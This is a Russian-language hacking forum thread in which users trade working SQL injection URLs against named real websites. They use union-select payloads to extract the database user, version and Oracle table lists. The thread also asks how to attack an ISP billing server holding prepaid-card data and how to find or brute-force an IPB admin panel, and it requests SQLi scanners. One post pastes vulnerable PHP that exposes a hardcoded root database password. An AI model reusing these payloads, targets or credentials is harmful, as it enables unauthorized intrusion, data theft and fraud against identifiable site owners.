http://www.citycollege.ac.cy/link.php?id=-211+union+select+1,concat_ws(0x3a,user(),version(),database()),user()--
http://amxbans.snakearena.net/ban_details.php?bid=-1+union+select+1,2,3,4,5,6 вроде как инъекция, но ничего не выводит...
https://forum.antichat.ru/showpost.php?p=1108085&postcount=2 https://forum.antichat.ru/showpost.php?p=1108479&postcount=3
подскажите мне! у меня в сети есть сервак! через который сеть выходит в инет! на нем есть сайт статистики,вот я там полазил и нашёл такую штуку-в периоде с ...... по ..... если ставишь > то после поля даты появляется name=date_end> , а во втором окне если так же сделать,то будет name=date_beg>, а если поставить ' в самом поле периода вместо даты появляется вот так \' Так же доступно phpinfo.php Что я могу тут сделать? я в php не оч шарю.И еще скажи мне если я через этот локальный сайт статистики ввожу карточку(которую покупаю для инета) он мне зачисляет на мой аккаунт деньги не выходя в нет! я вот думаю-значит бд карточек на серваке находится? или там другая система?
похоже на XSS. Вообще по такому описанию сказачть оч сложно. или давай ссылку(!!!!!) или расписывай подробнее.
пробую эту фишку - http://forum.antichat.ru/showpost.php?p=663815&postcount=2 скуля, 8 полей,во второе вттыкаю кавычку в хексе,вылазает ошибка,пробую подобрать во втором запросе колонки,ниче не получаеццо ( скрипт прочитал бажный, вот код, должна ли тут работать эта фишка или меня глючит? PHP: <?php // Libraries include '../php-bin/PageFunctions.php'; include '../php-bin/lib/querylib.php'; $nid = @$_GET['nid']; $category = @$_GET['category']; // If no nid, exit if ($nid == "") { echo("Error: no article ID"); exit; } // Create a PageFunctions object $objPFunc = new PageFunctions(); $query = new Query('localhost', 'root', '4dm1n777', "www"); // Year hash $tmonth = array(); $tmonth['1'] = "January"; $tmonth['2'] = "February"; $tmonth['3'] = "March"; $tmonth['4'] = "April"; $tmonth['5'] = "May"; $tmonth['6'] = "June"; $tmonth['7'] = "July"; $tmonth['8'] = "August"; $tmonth['9'] = "September"; $tmonth['10'] = "October"; $tmonth['11'] = "November"; $tmonth['12'] = "December"; $getitem = $query->SQL("select * from newsitem where nid = " . $nid . " limit 1"); $item = mysql_fetch_assoc($getitem); $gettext = $query->SQL("select * from newstext where nid = " . $nid . " limit 1"); $text = mysql_fetch_assoc($gettext); $getcat = $query->SQL("select ctitle from newscategory where cid = " . $item['cid'] . " limit 1"); $cattext = mysql_fetch_assoc($getcat); $query->Disconnect(); ?> add: бажный параметр - nid
2 cr0w хмм, всмысле во внутреннем запросе? так должен прокатить трюк со внутренним запросом или нет? и если да,как его реализовать,а то чет у меня мозгов не хватает
2Assembler http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=2+and+1=1+--+ вот скуль)) blind)) http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+1,2,3,4,5,6,7,8,9,0,1+from+news+--+ http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+null,null,null,null,null,null,null,null,null,null,null+from+news+--+
а вот и все таблички http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+table_name,null,null,null,null,null,null,null,null,null,null+from+sys.user_tables+--+
скажите пожалуйста как найти админку в ipb <=2.3.5 если она не по дефолту admin =( чем поперебирать или где найти?
Обычно когда логинешься под админом акком, просто на форуме в смысле, то пояляеться линк на админку, ну или брут скриптом.
подскажите программы-сканеры (или ветку где обсуждалось и заливалось) для sql иньекций.. для полуавтоматической подстановки полей ... и т.д. типа SIPT 4 спасиба